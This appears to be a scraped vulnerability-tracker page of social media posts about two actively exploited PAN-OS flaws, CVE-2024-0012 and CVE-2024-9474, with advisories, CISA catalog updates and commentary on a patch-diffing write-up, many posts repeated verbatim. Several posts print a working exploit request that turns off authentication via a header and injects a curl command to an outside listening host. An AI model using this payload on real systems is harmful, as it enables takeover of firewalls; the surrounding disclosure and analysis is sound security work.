Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC

##

oots at 2024-11-19T20:32:29.395Z ##

How to hack a firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

oots@infosec.exchange at 2024-11-19T20:32:29.000Z ##

How to hack a #PaloAlto firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

#CVE20240012 #CVE20249474 #CVE #CVE2024

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

screaminggoat at 2024-11-19T15:48:04.095Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

##

threatcodex at 2024-11-19T14:28:46.687Z ##

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474

labs.watchtowr.com/pots-and-pa

##

screaminggoat at 2024-11-18T19:18:33.674Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

##

screaminggoat at 2024-11-18T15:31:42.026Z ##

Unit 42: ⁠Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

##

screaminggoat at 2024-11-18T14:29:10.181Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

##

screaminggoat@infosec.exchange at 2024-11-19T15:48:04.000Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity

##

screaminggoat@infosec.exchange at 2024-11-18T19:18:33.000Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster

##

screaminggoat@infosec.exchange at 2024-11-18T15:31:42.000Z ##

Unit 42: ⁠Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC

##

screaminggoat@infosec.exchange at 2024-11-18T14:29:10.000Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC

##

AAKL at 2024-11-20T16:16:25.592Z ##

Unit 42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 unit42.paloaltonetworks.com/cv

##

571906@ap.podcastindex.org at 2024-11-20T02:45:06.000Z ##

New Episode: ISC StormCast for Wednesday, November 20th, 2024

Shownotes:
Detecting the Presence of a Debugger in Linux
https://isc.sans.edu/diary/Detecting%20the%20Presence%20of%20a%20Debugger%20in%20Linux/31450
Palo Alto Patches
https://security.paloaltonetworks.com/CVE-2024-0012
https://security.paloalt

AntennaPod | Anytime Player | Apple Podcasts | Castamatic | CurioCaster | Fountain | gPodder | Overcast | Pocket Casts | Podcast Addict | Podcast Guru | Podnews | Podverse | Truefans

Or Listen right here.

##

patchnow24x7 at 2024-11-20T08:44:30.302Z ##

Updates on PAN-SA-2024-0015: The blog has been updated with the following latest information provided by Palo Alto.

1) CVE-2024-0012 has been assigned
2) Indicators of Compromise has been updated.
3) Added a section "What if I found one of the IOCs in my Organization's environment??"
4) Affected Products and Product versions has been updated
5) Fixed versions has been updated.

Refer: patchnow24x7.com/blog-1/f/pan-










##

chris@mas.todon.rocks at 2024-11-20T08:27:11.000Z ##

r u freakin' kidding me? "X-PAN-AUTHCHECK: off" - seriously?!

labs.watchtowr.com/pots-and-pa

##

iagox86 at 2024-11-19T18:22:11.850Z ##

Favorite quote from WatchTowr's blog about PAN-OS vuln:

I guess auto_prepend_file actually has legitimate use besides writing PHP exploits.

labs.watchtowr.com/pots-and-pa

##

mttaggart at 2024-11-19T16:13:30.453Z ##

Reading the awesome WatchTowr writeup of CVE-2024-0012 and CVE-2024-9474, the Palo Alto RCE/privesc one-two punch. Great work here as always. And h/t to @screaminggoat , of course.

labs.watchtowr.com/pots-and-pa

A few things stand out:

First, sorry @cR0w, no for you:

We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?! At this point, why is anyone surprised?

That’s right folks, a simple reproducer for CVE-2024-0012. It couldn't be easier than that.

That's the auth bypass. And then, WHAT IS THIS DOING IN ANYTHING

return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");

So obviously if that $username has shell metacharacters, you have yourself a nice command injection.

And guess what user the service runs as?

##

AAKL@infosec.exchange at 2024-11-20T16:16:25.000Z ##

#PaloAlto Unit 42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 and CVE-2024-9474 unit42.paloaltonetworks.com/cv #cybersecurity #Infosec

##

patchnow24x7@infosec.exchange at 2024-11-20T08:44:30.000Z ##

Updates on PAN-SA-2024-0015: The blog has been updated with the following latest information provided by Palo Alto.

1) CVE-2024-0012 has been assigned
2) Indicators of Compromise has been updated.
3) Added a section "What if I found one of the IOCs in my Organization's environment??"
4) Affected Products and Product versions has been updated
5) Fixed versions has been updated.

Refer: patchnow24x7.com/blog-1/f/pan-

#PatchNOW
#Vulnerability
#ComputerSecurity
#hacked
#Cyberattack
#infosec
#informationsecurity
#CyberSecurityAwareness
#DataBreach
#cybersecurity

##

chris@mas.todon.rocks at 2024-11-20T08:27:11.000Z ##

r u freakin' kidding me? "X-PAN-AUTHCHECK: off" - seriously?!

labs.watchtowr.com/pots-and-pa

##

iagox86@infosec.exchange at 2024-11-19T18:22:11.000Z ##

Favorite quote from WatchTowr's blog about PAN-OS vuln:

I guess auto_prepend_file actually has legitimate use besides writing PHP exploits.

labs.watchtowr.com/pots-and-pa

##

mttaggart@infosec.exchange at 2024-11-19T16:13:30.000Z ##

Reading the awesome WatchTowr writeup of CVE-2024-0012 and CVE-2024-9474, the Palo Alto RCE/privesc one-two punch. Great work here as always. And h/t to @screaminggoat , of course.

labs.watchtowr.com/pots-and-pa

A few things stand out:

First, sorry @cR0w, no #directorytraversalmemes for you:

We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?! At this point, why is anyone surprised?

That’s right folks, a simple reproducer for CVE-2024-0012. It couldn't be easier than that.

That's the auth bypass. And then, WHAT IS THIS DOING IN ANYTHING

return $p->pexecute("/usr/local/bin/pan_elog -u audit -m $msg -o $username");

So obviously if that $username has shell metacharacters, you have yourself a nice command injection.

And guess what user the service runs as?

##

AAKL@infosec.exchange at 2024-11-19T15:17:42.000Z ##

WatchTower: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 labs.watchtowr.com/pots-and-pa #cybersecurity #infosec #PaloAlto

##

AAKL@infosec.exchange at 2024-11-19T14:00:31.000Z ##

If you missed this, #PaloAlto has patched a Firewall Zero-Day Exploited in Operation Lunar Peek securityweek.com/palo-alto-pat @SecurityWeek @ekovacs

More:

Palo Alto Unit 42 posted this yesterday about Lunar Peek activity related to CVE-2024-0012: unit42.paloaltonetworks.com/cv

##

ljrk@todon.eu at 2024-11-19T11:30:19.000Z ##

@christopherkunz Palo Alto keeps on giving.

labs.watchtowr.com/pots-and-pa

##

adulau@infosec.exchange at 2024-11-19T11:19:38.000Z ##

Curious about CVE-2024-0012 - PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The overall sighting gives a good timeline of activities concerning the vulnerability.

🔗 vulnerability.circl.lu/vuln/CV

#infosec #opensource #cybersecurity #vulnerability #paloalto

##

GossiTheDog@cyberplace.social at 2024-11-19T11:07:22.000Z ##

Weeeeeee

I don’t know why Palo-Alto changed the CVEs at the last minute to remove reference to RCE. It’s remote code execution. labs.watchtowr.com/pots-and-pa

##

_r_netsec@infosec.exchange at 2024-11-19T09:43:06.000Z ##

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474 - watchTowr Labs labs.watchtowr.com/pots-and-pa

##

oversecurity@mastodon.social at 2024-11-19T09:10:08.000Z ##

CISA Adds Three Critical Vulnerabilities to the Known Exploited Vulnerabilities Catalog

: CISA adds CVE-2024-1212, CVE-2024-0012, and CVE-2024-9474 to the Known Exploited Vulnerabilities Catalog (KEV).

🔗️ [Cyble] link.is.it/so5jib

##

res260@infosec.exchange at 2024-11-19T01:25:02.000Z ##

The way Palo Alto Networks has handled information disclosure regarding CVE-2024-0012 has been terrible 😬

#paloaltonetworks

##

screaminggoat@infosec.exchange at 2024-11-18T22:03:01.000Z ##

@catc0n I noticed the disparity between the CVE-2024-9474 advisory description "privilege escalation vulnerability" and CISA's KEV Catalog name "Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability"

Palo Alto Networks discarded the verbiage from Thursday "unauthenticated remote command execution vulnerability" and divided the unauth RCE into 2 separate vulnerabilities, while stating that one would be allow for the other.

So authentication bypass to admin (CVE-2024-0012), then authenticated privesc from admin to root (CVE-2024-9474).

Unit 42 skipped talking about CVE-2024-9474.

The CVSSv4 vector is CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:A/AU:N/R:U/V:C/RE:H/U:Red I think the real takeaway is that only Integrity is impacted. Everything else appears to be the consequence of having root privileges on a firewall

##

screaminggoat@infosec.exchange at 2024-11-18T21:03:07.000Z ##

@shadowserver IOCs provided by Unit 42: unit42.paloaltonetworks.com/cv

CVEs were added to CISA's KEV Catalog: cisa.gov/news-events/alerts/20

##

AAKL@infosec.exchange at 2024-11-18T20:25:29.000Z ##

#CISA has updated the KEV catalogue:

CVE-2024-1212: Progress Kemp LoadMaster OS Command Injection Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-0012: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability cve.org/CVERecord?id=CVE-2024-

- CVE-2024-9474: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability cve.org/CVERecord?id=CVE-2024- @cisacyber #cybersecurity #infosec #PaloAlto

##

cisakevtracker@mastodon.social at 2024-11-18T20:01:06.000Z ##

CVE ID: CVE-2024-0012
Vendor: Palo Alto Networks
Product: PAN-OS
Date Added: 2024-11-18
Vulnerability: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
Notes: security.paloaltonetworks.com/ ; nvd.nist.gov/vuln/detail/CVE-2
CVE URL: nvd.nist.gov/vuln/detail/CVE-2

##

AAKL@infosec.exchange at 2024-11-18T16:27:18.000Z ##

#PaloAlto has updated its security advisories: security.paloaltonetworks.com/

- CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface security.paloaltonetworks.com/

- CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface @paloaltontwks #cybersecurity #infosec

##

jos1264@social.skynetcloud.site at 2024-11-18T16:20:02.000Z ##

Attackers are exploiting 2 zero-days in Palo Alto Networks firewalls (CVE-2024-0012, CVE-2024-9474) helpnetsecurity.com/2024/11/18 #PaloAltoNetworks #enterprise #Don'tmiss #Hotstuff #firewall #0-day #News #CVE

##

zeljkazorz@infosec.exchange at 2024-11-18T16:06:38.000Z ##

Palo Alto Networks has released fixes for two vulnerabilities (CVE-2024-0012 and CVE-2024-9474) in its next-generation firewalls that have been exploited by attackers as zero-days.

CVE-2024-0012 is the (previously unspecified) unauthenticated remote command execution zero-day that the company started warning about ten days ago.

helpnetsecurity.com/2024/11/18

#CVE #Cybersecurity

##

cR0w@infosec.exchange at 2024-11-18T15:30:09.000Z ##

@screaminggoat "Palo Alto Networks and Unit 42 are engaged in tracking a limited set of exploitation activity related to CVE-2024-0012 and are working with external researchers, partners, and customers to share information transparently and rapidly." 🤔

unit42.paloaltonetworks.com/cv

##

AAKL@infosec.exchange at 2024-11-18T15:12:39.000Z ##

Palo Alto Unit42 Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012 unit42.paloaltonetworks.com/cv @unit42_intel #cybersecurity #infosec

##

screaminggoat@infosec.exchange at 2024-11-18T14:57:27.000Z ##

@neurovagrant start your Monday off with exploited zero-days:

##

screaminggoat@infosec.exchange at 2024-11-18T14:49:21.000Z ##

@therecord_media @jwarminsky @jgreig can this news article be updated to include the two CVE IDs?: CVE-2024-0012 and CVE-2024-9474

##

cR0w@infosec.exchange at 2024-11-18T13:52:56.000Z ##

Huh. So PAN apparently released sigs to cover a critical vuln in the PAN-OS web management interface. Could this finally be it? They list it as CVE-2024-0012 and link to the advisory.

Well, the link is broken, but maybe it's just not published yet: security.paloaltonetworks.com/

Let's take a look at that CVE on cve.org: cve.org/CVERecord?id=CVE-2024-

Oh, still says reserved. Maybe they meant their own advisory number of PAN-SA-2024-0012: security.paloaltonetworks.com/

No, that doesn't make sense. That's about a bunch of OSS CVEs that are not even confirmed to be impacting PAN-OS.

So here we are once again with PAN using lots of words to say nothing. *sigh*

I need more coffee.

##

CVE-2024-9474
(7.2 HIGH)

EPSS: 97.40%

updated 2024-11-19T17:16:40.513000

51 posts

A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges. Cloud NGFW and Prisma Access are not impacted by this vulnerability.

Nuclei template

3 repos

https://github.com/Chocapikk/CVE-2024-9474

https://github.com/hazesecurity/CVE-2024-9474

https://github.com/k4nfr3/CVE-2024-9474

oots at 2024-11-19T20:32:29.395Z ##

How to hack a firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

oots@infosec.exchange at 2024-11-19T20:32:29.000Z ##

How to hack a #PaloAlto firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

#CVE20240012 #CVE20249474 #CVE #CVE2024

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

screaminggoat at 2024-11-19T15:48:04.095Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

##

threatcodex at 2024-11-19T14:28:46.687Z ##

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474

labs.watchtowr.com/pots-and-pa

##

screaminggoat at 2024-11-18T19:18:33.674Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

##

screaminggoat at 2024-11-18T15:31:42.026Z ##

Unit 42: ⁠Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: @cR0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

##

screaminggoat at 2024-11-18T14:29:10.181Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

##

screaminggoat@infosec.exchange at 2024-11-19T15:48:04.000Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

#CVE_2024_0012 #CVE_2024_9474 #eitw #activeexploitation #vulnerability #zeroday #paloaltonetworks #panos #rootcauseanalysis #infosec #cybersecurity

##

screaminggoat@infosec.exchange at 2024-11-18T19:18:33.000Z ##

CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!

  • CVE-2024-0012 (CVSSv4: 9.3 critical) Palo Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability
  • CVE-2024-9474 (CVSSv4: 6.9 medium) Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability
  • CVE-2024-1212 (perfect 10.0 🥳) Progress Kemp LoadMaster OS Command Injection Vulnerability

#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster

##

screaminggoat@infosec.exchange at 2024-11-18T15:31:42.000Z ##

Unit 42: ⁠Threat Brief: Operation Lunar Peek, Activity Related to CVE-2024-0012
Unit 42 has additional Indicators of Compromise related to CVE-2024-0012 and CVE-2024-9474 Palo Alto Networks PAN-OS zero-day exploitation, tracked as Operation: Lunar Peek.

h/t: cr0w cc: @briankrebs @GossiTheDog @ntkramer @iagox86 @dreadpir8robots @deepthoughts10 @mttaggart @catc0n @campuscodi and whoever else cares

#CVE_2024_0012 #CVE_2024_9474 #threatintel #infosec #cybersecurity #cyberthreatintelligence #OperationLunarPeek #LunarPeek #infosec #CTI #IOC

##

screaminggoat@infosec.exchange at 2024-11-18T14:29:10.000Z ##

Palo Alto Networks 11/18 update: CVE-2024-0012 PAN-OS: Authentication Bypass in the Management Web Interface (PAN-SA-2024-0015)

The actively exploited zero-day now has a CVE ID: CVE-2024-0012* (9.3 critical) An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474

Second actively exploited zero-day: CVE-2024-9474 PAN-OS: Privilege Escalation (PE) Vulnerability in the Web Management Interface
CVE-2024-9474 (6.9 medium) A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges.

New Indicators of compromise at Unit 42: unit42.paloaltonetworks.com/cv

#paloaltonetworks #zeroday #vulnerability #pan #CVE_2024_9474 #CVE_2024_0012 #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec #IOC

##

oots at 2024-11-19T20:32:29.395Z ##

How to hack a firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

oots@infosec.exchange at 2024-11-19T20:32:29.000Z ##

How to hack a #PaloAlto firewall:

POST /php/utils/createRemoteAppwebSession.php/aaaa.js.map HTTP/1.1
Host: {{Hostname}}
X-PAN-AUTHCHECK: off
Content-Type: application/x-www-form-urlencoded
Content-Length: 99

user=`curl {{listening-host}}`&userRole=superuser&remoteHost=&vsys=vsys1

labs.watchtowr.com/pots-and-pa

#CVE20240012 #CVE20249474 #CVE #CVE2024

##

jos1264@social.skynetcloud.site at 2024-11-18T17:20:03.000Z ##

Palo Alto Reports Two More Bugs in PAN-OS That Are Being Actively Exploited thecyberexpress.com/palo-alto- #PaloAltoPANOSvulnerability #TheCyberExpressNews #VulnerabilityNews #Vulnerabilities #PaloAltoNetwork #TheCyberExpress #FirewallDaily #CVE20240012 #CVE20249474 #CyberNews #PANOS

##

screaminggoat at 2024-11-19T15:48:04.095Z ##

watchTowr: Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474
With the release of security patches for Palo Alto Networks' exploited zero-days, watchTowr performed some patch-diffing and found the root cause of CVE-2024-0012: "We simply… supply the off value to the X-PAN-AUTHCHECK HTTP request header, and the server helpfully turns off authentication?!" and of CVE-2024-9474: "Somehow a user is able to pass a username containing shell metacharacters into the AuditLog.write() function, which then passes its value to pexecute()." The remote command execution vulnerability of CVE-2024-9474 is the ability to pass a curl command for the user value in the POST request; which allows the attacker to specify an arbitrary user, an arbitrary user role (&userRole=superuser) and be granted a valid PHP session.

##

threatcodex at 2024-11-19T14:28:46.687Z ##

Pots and Pans, AKA an SSLVPN - Palo Alto PAN-OS CVE-2024-0012 and CVE-2024-9474

labs.watchtowr.com/pots-and-pa

##

screaminggoat at 2024-11-18T19:18:33.674Z ##

